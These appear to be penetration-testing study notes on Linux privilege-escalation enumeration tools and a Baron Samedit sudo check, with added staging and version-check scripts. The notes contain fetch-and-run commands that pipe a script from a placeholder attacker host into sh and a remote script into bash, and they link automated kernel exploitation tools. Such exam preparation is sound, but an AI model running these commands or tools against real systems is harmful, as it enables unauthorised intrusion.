Linux post exploitation scripts

I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it is well maintained and frequently updated for the latest bugs and patches.

Words of wisdom

Be careful with which scripts you execute: auto-exploitation is completely prohibited in the exam, and you will fail if you make this mistake, even unintentionally. So ALWAYS check what you are running before executing it (pay particular attention to the word 'auto-exploitation' in scripts).

Execution of script

wget -qO- http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This pulls the file from the attacker box, executes it, and also stores the output in output.txt
# (-qO- makes wget write the script to stdout instead of a file, which is what the pipe into sh needs)

Common locations with writable permissions to download and execute scripts from

/tmp
/dev/shm
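The download / review / execute workflow above, as an added example that is not part of the original notes: it picks the first writable staging directory from the list, fetches the script, strips CRLF line endings, and greps it for auto-exploitation markers before anything is run. The function names (pick_writable_dir, review_script, stage_script) and the flagged-phrase pattern are my own construction, not from any of the listed tools.

```sh
#!/bin/sh
# Added example, not from the original notes: stage an enumeration script in a
# writable directory and scan it for signs of automatic exploitation before it
# is ever executed, following the "check what you run first" rule above.

# Print the first candidate directory that exists and is writable by us.
# /tmp and /dev/shm are the usual candidates listed in the notes.
pick_writable_dir() {
    for d in "$@"; do
        if [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# Exit status: 0 = no flagged phrase found, 1 = flagged lines found (they are
# printed with line numbers so they can be read in context), 2 = unreadable file.
review_script() {
    file=$1
    [ -r "$file" ] || return 2
    # Constructed pattern: matches auto-exploit, autoexploit, auto exploit(ation) ...
    pattern='auto[- ]\{0,1\}exploit'
    if grep -n -i "$pattern" "$file"; then
        return 1
    fi
    return 0
}

# Fetch into the staging dir, normalise line endings (the same sed used for
# bangenum.sh below), make executable, then review. Running the script is
# deliberately left to the operator after reading any findings.
stage_script() {
    url=$1
    dir=$(pick_writable_dir /tmp /dev/shm) || { echo "no writable staging dir" >&2; return 1; }
    name=${url##*/}
    wget -q -O "$dir/$name" "$url" || return 1
    sed -i -e 's/\r$//' "$dir/$name"
    chmod +x "$dir/$name"
    if review_script "$dir/$name"; then
        echo "$dir/$name: no auto-exploitation markers; read it, then run: $dir/$name | tee $dir/output.txt"
    else
        echo "$dir/$name: flagged lines above, do not run until reviewed" >&2
        return 1
    fi
}

# Usage: stage_script http://<Attacker_IP>/<script_name>
```

The grep is only a first filter: a script can exploit something without ever using the word, so the "read it" step is the real control and the pattern just points you at the obvious places first.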

bangenum.sh (initial linux enumeration)

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh    # strip Windows line endings so the shebang is honoured
chmod +x bangenum.sh               # wget does not set the execute bit
./bangenum.sh

PSPY

What is running, any cron jobs any scripts? Use PSPY to find out

https://github.com/DominicBreuker/pspy

linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration

SUID3NUM (SUID binary enumeration)

https://github.com/Anon-Exploiter/SUID3NUM

xploit_installer.py (exploit suggester)

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>

Unix Priv checker

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
chmod +x upc.sh
./upc.sh standard > output.txt    # the downloaded file is upc.sh, so run it under that name

linux-local-enum.sh

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh

linuxprivchecker.py

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

linux-exploit-suggester.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

KernelPop

Automated kernel vulnerability enumeration and exploitation

https://github.com/spencerdodd/kernelpop

Baron Samedit (CVE-2021-3156):

Link: https://blog.cxaqhq.cn/post/oscp-relia/?_x_tr_sl=zh-TW&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86:~:text=Sudo%20Privilege%20Escalation

Step 1: Check Your sudo Version

Run:

sudo --version

Look at the first line of output. Vulnerable versions include:

  • 1.8.2 to 1.8.31p2

  • 1.9.0 to 1.9.5p1

  • Any version below 1.8.31p2 or 1.9.5p2 is likely vulnerable.
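The version check in Step 1, as an added example that is not part of the original notes: it parses the first line of `sudo --version` and tests it against the two ranges listed above (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1). The helper names (sudo_version_key, sudo_version_vulnerable, check_local_sudo) and the integer encoding of versions are my own construction.

```sh
#!/bin/sh
# Added example, not from the original notes: classify a 'sudo --version'
# first line against the vulnerable ranges listed above. Version strings are
# turned into one integer so they can be compared with plain shell arithmetic.

# Convert "1.8.31p2" into major*1000000 + minor*10000 + release*100 + patchlevel.
# Versions without a "pN" suffix get patchlevel 0, so 1.9.5 sorts before 1.9.5p1.
sudo_version_key() {
    ver=$1
    base=${ver%%p*}              # 1.8.31
    patch=${ver#"$base"}         # p2, or empty
    patch=${patch#p}
    patch=${patch:-0}
    old_ifs=$IFS
    IFS=.
    set -- $base                 # split on dots into $1 $2 $3
    IFS=$old_ifs
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 10000 + ${3:-0} * 100 + patch ))
}

# Takes the first output line of 'sudo --version', e.g. "Sudo version 1.9.5p1".
# Exit status: 0 = inside a listed vulnerable range, 1 = outside it,
# 2 = the line is not a sudo version line at all.
sudo_version_vulnerable() {
    line=$1
    ver=$(printf '%s\n' "$line" | sed -n 's/^Sudo version \([0-9][0-9.]*p\{0,1\}[0-9]*\).*/\1/p')
    [ -n "$ver" ] || return 2
    key=$(sudo_version_key "$ver")
    # Legacy branch: 1.8.2 .. 1.8.31p2
    if [ "$key" -ge "$(sudo_version_key 1.8.2)" ] && [ "$key" -le "$(sudo_version_key 1.8.31p2)" ]; then
        return 0
    fi
    # Stable branch: 1.9.0 .. 1.9.5p1
    if [ "$key" -ge "$(sudo_version_key 1.9.0)" ] && [ "$key" -le "$(sudo_version_key 1.9.5p1)" ]; then
        return 0
    fi
    return 1
}

# Run the check against the sudo on this host and print a verdict.
check_local_sudo() {
    first=$(sudo --version 2>/dev/null | head -n 1)
    sudo_version_vulnerable "$first"
    rc=$?
    case $rc in
        0) echo "in a listed vulnerable range: $first" ;;
        1) echo "outside the listed ranges: $first" ;;
        *) echo "could not parse sudo version output" ;;
    esac
    return $rc
}

# Usage: sh thisfile.sh --local
case ${1:-} in --local) check_local_sudo ;; esac
```

One caveat worth keeping in mind: the version string alone cannot see distribution backports. Ubuntu 20.04's patched package still reports "Sudo version 1.8.31", so this check says "vulnerable range" there even though the fix is applied; treat the result as a prompt to look at the package changelog (or run the Step 2 check), not as a verdict.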

Step 2: Test with a Proof of Concept (Safe Way)

  1. Rather than using potentially unsafe PoC code, you can run a known-check script.

  2. Safer test (using a community detection script):

curl -s https://raw.githubusercontent.com/blasty/CVE-2021-3156/master/check_sudo_vuln.sh | bash

This script checks for vulnerable versions and attempts a non-exploitative check.
